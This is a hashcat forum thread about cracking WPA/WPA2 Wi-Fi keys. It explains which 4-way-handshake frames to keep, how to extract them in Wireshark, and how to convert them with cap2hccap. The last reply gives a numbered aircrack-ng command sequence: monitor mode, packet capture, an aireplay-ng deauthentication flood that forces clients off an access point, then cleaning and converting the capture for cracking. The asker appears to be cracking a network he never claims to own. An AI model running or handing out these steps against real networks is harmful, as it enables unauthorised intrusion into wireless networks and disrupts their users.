hashcat Forum

Full Version: Which parts of 4 way handshake is needed? Which part is used by hashcat to crack?
You're currently viewing a stripped down version of our content. View the full version with proper formatting.
As the topic suggests really, how many parts and which parts of the 4 way handshake is needed by hashcat to crack WPA/2 and what does hashcat use to crack WPA/2. I only have parts 1, 2 & 3 of the 4 way handshake is that enough for hashcat as i'm finding it difficult to get a full 4 way handshake? I have read that it's possible to crack WPA/2 with only parts 1&2 (possibly 3 too) but i'm also finding conflicting answers!
Regarding which part of the 4 way handshake does hashcat use for it's cracking purposes is exactly that, does it use the MIC from the AP or some other info from the handshake packet? I'm mainly just interested but also for future reference and so that someone else with the same question can find the correct answer in regards to hashcat as i'm guessing that different programs use different but similar ways to process the handshake and crack the WPA/2 key. All answers greatly appreciated.
1 and 2
plus beacon
So the beacon should be with those packets I take it? Would somebody mind taking a quick look at this cap file and let me know if all is there to continue cracking with oclhashcat please? I'm guessing that everything I need is there, the 1, 2 & 3 packets are at the beginning of those eapol packets captured & Pyrit shows the following -

#1: AccessPoint 20:0c:c8:xx:xx:xx ('VMxxxxx-2G'):
#1: Station 28:18:78:xx:xx:xx, 4 handshake(s):
#1: HMAC_SHA1_AES, good, spread 1
#2: HMAC_SHA1_AES, good, spread 3
#3: HMAC_SHA1_AES, bad, spread 2
#4: HMAC_SHA1_AES, bad, spread 5
#2: Station 60:21:c0:xx:xx:xx

Here's the cap file - https://www.mediafire.com/?gxh13c760zt9ls4

Many thanks Fonzy35 for your response, it's appreciated.
wireshark the cap file, then you see the beacon that broadcast the SSID, mark toggle that beacon, then filter eapol, mark toggle the eapol 1 and 2 in sequence.
Then clear the filter en hit enter, that will bring you back to the full cap file
then export specify packets, choose mark packets, there should be 3, put a name ex.: 3_packets_beacon_eapol_1_2.cap

after that cap2haccp in linux,
./cap2hccap.bin 3_packets_beacon_eapol_1_2.cap 3_packets_beacon_eapol_1_2.hccap


works for me every time..
eapol packet need to be in sequence if there are many eapol 1, and 2

m1/4
m1/4
m2/4
m2/4

you take the 2 in the middle that match the same client and ap

*You could see a handshake when you did your capture even if someone try to connect with a wrong wpa key.. Best thing is when you can deauthenticat a client that is already connect.*

check you private message

PS don't put the mac address,ssid,hash public.. Admin don't like that

best of luck
(02-22-2015, 06:51 AM)fonzy35 Wrote: [ -> ]wireshark the cap file, then you see the beacon that broadcast the SSID, mark toggle that beacon, then filter eapol, mark toggle the eapol 1 and 2 in sequence.
Then clear the filter en hit enter, that will bring you back to the full cap file
then export specify packets, choose mark packets, there should be 3, put a name ex.: 3_packets_beacon_eapol_1_2.cap

after that cap2haccp in linux,
./cap2hccap.bin 3_packets_beacon_eapol_1_2.cap 3_packets_beacon_eapol_1_2.hccap


works for me every time..
eapol packet need to be in sequence if there are many eapol 1, and 2

m1/4
m1/4
m2/4
m2/4

you take the 2 in the middle that match the same client and ap

*You could see a handshake when you did your capture even if someone try to connect with a wrong wpa key.. Best thing is when you can deauthenticat a client that is already connect.*

check you private message

PS don't put the mac address,ssid,hash public.. Admin don't like that

best of luck


Thanks for that info regarding wireshark, I knew it could be done that way but for the life of me I couldn't remember how to or find info on how to do it! I have already been trying to crack this network and am about half way through but felt it time to ask in the right place if the cap was any good as I hadn't found anything yet (strange logic I know but hey!) I will edit my previous post and omit the info you mentioned to stay within the rules. Thanks again.
I send you a link in your private message for your cap file I edited to a beacon and the 2 eapol cap file
Yes I got that, thanks. I somehow managed to get a full 4 way handshake from the AP, never managed to before so i've followed your directions and stripped the beacon & 4 way handshake frames and converted it to a hccap file to continue cracking from where the other 1 left off. With any luck I should stumble upon the key soon enough and if not i'll go over the keyspace that i've already got through and find it there. Thanks for all your input, I wouldn't have got this far without it!
(02-22-2015, 10:06 AM)h4x0rm1k3 Wrote: [ -> ]Yes I got that, thanks. I somehow managed to get a full 4 way handshake from the AP, never managed to before so i've followed your directions and stripped the beacon & 4 way handshake frames and converted it to a hccap file to continue cracking from where the other 1 left off. With any luck I should stumble upon the key soon enough and if not i'll go over the keyspace that i've already got through and find it there. Thanks for all your input, I wouldn't have got this far without it!

....and "wifite" was another program that didn't always work for me in The-Distribution-Which-Does-Not-Handle-OpenCL-Well (Kali). So, since you are having a problem with getting a full 4 way handshake, you can follow the process I use below in The-Distribution-Which-Does-Not-Handle-OpenCL-Well (Kali). It will also clean up the .cap file for you which you were also having an issue with. It works for me every time.

1. airmon-ng start wlan0 (puts your wireless NIC into monitor mode)
2. airodump-ng mon1 (or whatever mon0 it starts for you. make note of your targets channel)
3. airodump-ng mon1 -w /root/Desktop/handshake -c 1 (in a separate console. c = channel to listen on and stores .cap file on desktop)
4. aireplay-ng --deauth 0 -a AccessPointMAC --ignore-negative-one mon1 (forces reconnection of clients to capture handshake - it will flash quick in the airodump console!)
5. wpaclean /root/Desktop/clean.cap /root/Desktop/handshake.cap (yes it's backwards on purpose, cleans .cap to get it ready to convert to .hccap)
6. aircrack-ng /root/Desktop/clean.cap -J /root/Desktop/ready.hccap (converts cleaned.cap file to ready.hccap file for hashcat to crack. Can rename it to SSID if you want to keep organized)
7. If you don't clean the .cap first, you can see all the network names and if a handshake was captured or not. You can then pick one you want.